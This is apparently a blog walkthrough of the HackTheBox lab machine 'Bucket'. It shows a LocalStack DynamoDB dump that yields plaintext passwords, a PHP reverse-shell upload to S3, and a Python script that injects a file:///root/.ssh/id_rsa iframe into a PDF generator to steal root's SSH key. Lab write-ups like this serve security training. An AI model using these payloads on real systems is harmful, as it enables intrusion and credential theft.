This page looks best with JavaScript enabled

HackTheBox: Bucket

 ·  ☕ 4 min read

User

Started by enumerating ports as always:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ sudo scan bucket.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18💿9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 16
         Nmap: 9
         Total: 25

The first thing we see in the landing page is:
Landing page

If we take a look where the images are being stored it’s under the following direction http://s3.bucket.htb/adserver/images/. So it is using s3 buckets as storage.
Since htb machines are in local without internet access they may be using LocalStack and found this article on how to run aws-cli within localstack.

Firstly we checked if there is any data inside dynamodb:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb list-tables
TABLENAMES      users
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users
None    3       3
PASSWORD        Management@#1@#
USERNAME        Mgmt
PASSWORD        Welcome123!
USERNAME        Cloudadm
PASSWORD        n2vM-<_K_Q:.Aa2
USERNAME        Sysadm
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ 

And then used s3 buckets to upload a php reverse shell:

[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb s3 cp reverse.php s3://adserver
upload: ./reverse.php to s3://adserver/reverse.php             
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ curl http://bucket.htb/reverse.php

Now we have a shell, and checked what users are in the system and we can login as roy with the last password from dynamodb

Root

Checked if there is any service running on localhost and found what looks like a web:

roy@bucket:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:34825         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

Additionally the source code is readable by us inside /var/www/html/bucket_app so checked what it does and there is an interesting functionality:

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}

It is taking the data from dynamodb alert’s table and printing it to a pdf, so tried if there is ssrf to path disclosure in the html to pdf generator, following this guide. Then created a python script to automate the dynamo table creation and inserting the malicious alert, also getting the base64 of the file we want (id_rsa in this case).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python3
import paramiko
import requests
import time
import base64

def upload_payload():

    url = "http://s3.bucket.htb:80/"
    headers = {"Accept-Encoding": "gzip, deflate", "X-Amz-Target": "DynamoDB_20120810.CreateTable", "Content-Type": "application/x-amz-json-1.0", "User-Agent": "aws-cli/1.18.135 Python/3.9.1 Linux/5.9.0-kali5-amd64 botocore/1.17.22", "X-Amz-Date": "20210106T123302Z", "Authorization": "AWS4-HMAC-SHA256 Credential=dr/20210106/us-east-1/dynamodb/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=62e9f6918cee6fd2b5b619f9d9f892661a086e1f7af77b5deb7b85b2308ef1b5", "Connection": "close"}
    json={"AttributeDefinitions": [{"AttributeName": "title", "AttributeType": "S"}, {"AttributeName": "data", "AttributeType": "S"}], "KeySchema": [{"AttributeName": "title", "KeyType": "HASH"}, {"AttributeName": "data", "KeyType": "S"}], "ProvisionedThroughput": {"ReadCapacityUnits": 5, "WriteCapacityUnits": 5}, "TableName": "alerts"}
    requests.post(url, headers=headers, json=json)

    headers = {"Accept-Encoding": "gzip, deflate", "X-Amz-Target": "DynamoDB_20120810.PutItem", "Content-Type": "application/x-amz-json-1.0", "User-Agent": "aws-cli/1.18.135 Python/3.9.1 Linux/5.9.0-kali5-amd64 botocore/1.17.22", "X-Amz-Date": "20210106T123306Z", "Authorization": "AWS4-HMAC-SHA256 Credential=dr/20210106/us-east-1/dynamodb/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=9c0215d599c2d90f561635f299f5ef32875d34770434eaa856f02777eed31644", "Connection": "close"}
    json={"Item": {"data": {"S": "<iframe src='file:///root/.ssh/id_rsa'></iframe>"}, "title": {"S": "Ransomware"}}, "TableName": "alerts"}
    requests.post(url, headers=headers, json=json)

def get_rsa_id():
    hostname = "10.10.10.212"
    port = "22"
    username = "roy"
    password = "n2vM-<_K_Q:.Aa2"

    try:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.load_system_host_keys()
        client.connect(hostname, port=port, username=username, password=password)
        stdin, stdout, stderr = client.exec_command('curl -X POST -d "action=get_alerts" http://localhost:8000')
        stdin, stdout, stderr = client.exec_command('cat /var/www/bucket-app/files/result.pdf | base64')
        output = stdout.read().decode('ascii')
        output = "".join(output.split("\n"))
        return output
    finally:
        client.close()

if __name__ == "__main__":
    upload_payload()
    output = get_rsa_id()
    while not output:
        output = get_rsa_id()
    print(output)

Finally we decode the file base64 and create the pdf:

[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ python3 get_root_file.py | base64 -d > id_rsa.pdf
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ open id_rsa.pdf

Here is how the pdf looks like:

id_rsa

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover